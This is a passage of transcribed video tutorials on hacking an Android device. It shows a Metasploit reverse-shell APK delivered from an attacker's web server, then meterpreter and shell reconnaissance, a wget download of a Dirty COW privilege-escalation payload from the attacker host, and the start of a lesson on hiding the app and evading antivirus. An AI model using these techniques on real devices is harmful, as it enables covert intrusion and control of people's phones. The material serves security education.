enter show options. So show options would tell us the L host, so we can set L host as 192.168.1.14. So of course, we got to set the L port as 1234. So that is the payload that we were using. And of course, once you're done with that, you can go ahead and enter run or exploit, and it will actually run up and we'll get the listener. So moving back into the Android device, all we got to do is actually go under the URL link. So under the URL link, all we got to do is enter 192.168.1.14 followed by port 8001. So this is the port there specified for Apache web server. So again, you could have another different port, a different IP address, and so on. So mobile app.apk, hit enter on that, and that will begin the download of the file or the APK file. And all you got to do is drag down the information, mobile app.apk, hit enter on that. And of course, we got to install, read through the instructions, click install on that. So this would install the mobile application. And of course, in the future tutorial, we'll discuss about how we can change information like main activity, the logos, and so on, and even embed them into a legitimate file or legitimate APK file. So click open on that. And the stager will be sent over into the Android device, and we will have a meterpreter session. So we can enter help, and we can enter sysinfo. And this is the part where we can actually see like the computer operating system, the meterpreter type, and so on. And of course, one really important point that we want to get into is actually shell. So once you're in shell, you can actually enter who am I, and this will tell you the user that is currently using the mobile device. And of course, in this case, you have U0_A66. And once you're in shell, basically Android is a Linux distribution or a variant of Linux. And in this case, it means that a lot of the commands that you use in Linux will be highly applicable. So if I enter IP-ADDR, so this will tell us the internal IP address. So we have the IP address of 10.0.2.15. We can even do a ping, for example, to google.com and so on. And we can also see a lot of other capabilities and be able to find out all this information and so on. So we can enter shell again. And of course, there's other ways for you to do a lot of reconnaissance, a lot of auxiliary scanners that you can upload into. And of course, if you are able to ping into the internet, you can actually download files directly using wget. So in this case, for example, if I go into a separate terminal and I zoom in a little and I go to var www.html and I enter ls-l, and of course here we have all sorts of different kind of executables and payloads and so on. And there's another payload that we'll be introducing. So for example, over here we have the dirty cow payload. So this is a way for us to actually do a privilege escalation on Android. So in this case, we have a dirty cow.c. So we can compile it, make it available in the Apache web server, and from there on, the user will be able to execute it, do a wget download, and will be able to execute a file. So for example, if I do wget 192.168 HTTP 192.168.1.14 followed by port 8001 followed by slash, and then we can actually look at the other APK files that we want to download or install and so on. So of course we can actually enter dirty as well. So dirty, and this would actually download the file, and we can see the file being downloaded, and we can enter ls. Some of the main reasons you could be using your own shell rather than using MetaPreter is because you want to upload your own local exploit. You want to use it to scan the other network for different kind of devices. You want to know what's going on within the Android device on a more native level. So this is the reason why we may be using shell instead of the MetaPreter shell that you get all the time using all these different kind of exploits or APK reverse shell. So it's really important that you be able to get comfortable using some of these Linux commands, because you'll be crafting out your own script, building your own bash shell scripting and so on, especially in terms of post-exploitation that we will explore and discuss further in subsequent tutorials. So once again, I hope you've learned something valuable, and if you have any questions, feel free to leave a comment below and I'll try my best to answer any of those questions. And remember to like, share, and subscribe to the channel so that you can be kept abreast of the latest cybersecurity tutorial. Thank you so much once again for watching. Hi, and welcome back to another members-only exclusive video. So today we'll be discussing about a very simple trick on how you could actually hide the mobile application through Metasploit framework. So we'll create a APK file, and once we have created the APK file, we'll install it through a delivery mechanism from a web application server into the mobile device. And from there, we'll actually issue a command to actually hide the mobile app from the user. And the only way to see that will be to look into the settings of the applications and see what are some of the running services or running apps that are inside the mobile device. So without further ado, let us get started on today's tutorial. So on the left side of the screen, I have Kali Linux running, and we can actually go into terminal. And once we're in terminal, we can zoom it a little, and we can enter IP-ADDR. So with this, we can actually see the IP address of 192.168.1.11. So this is the IP address of the attacker server. So this is also the server where we'll be hosting the listening services coming from Metasploit. And of course, on the right side of the screen, I actually have an Android mobile device running. So this is running on the Oracle VirtualBox. So this is an Android that is running over here. And of course, we're able to surf into the net. And we can actually open up browsers, and we can actually go into the internet and be able to search up on information. Say, for example, enter Loy Liang Yang, we can see the website, the YouTube channel, and so on. So there is internet connection. So moving back into Kali Linux, we actually have to use MSF Venom. So you can actually enter MSF Venom. Then, of course, it will tell you all the parameters and options. And it's really important, especially when you're learning about cybersecurity, to try out all the tools, try out all the different parameters and options, like the changes in a NOP slab, for example, over here that you can see on the length of the NOP slab. And again, all these are actually being used to help you bypass a lot of these security mechanisms coming from the antivirus servers and so on. So really important way for you to really think about cybersecurity in a more advanced level. And a lot of the advanced level actually requires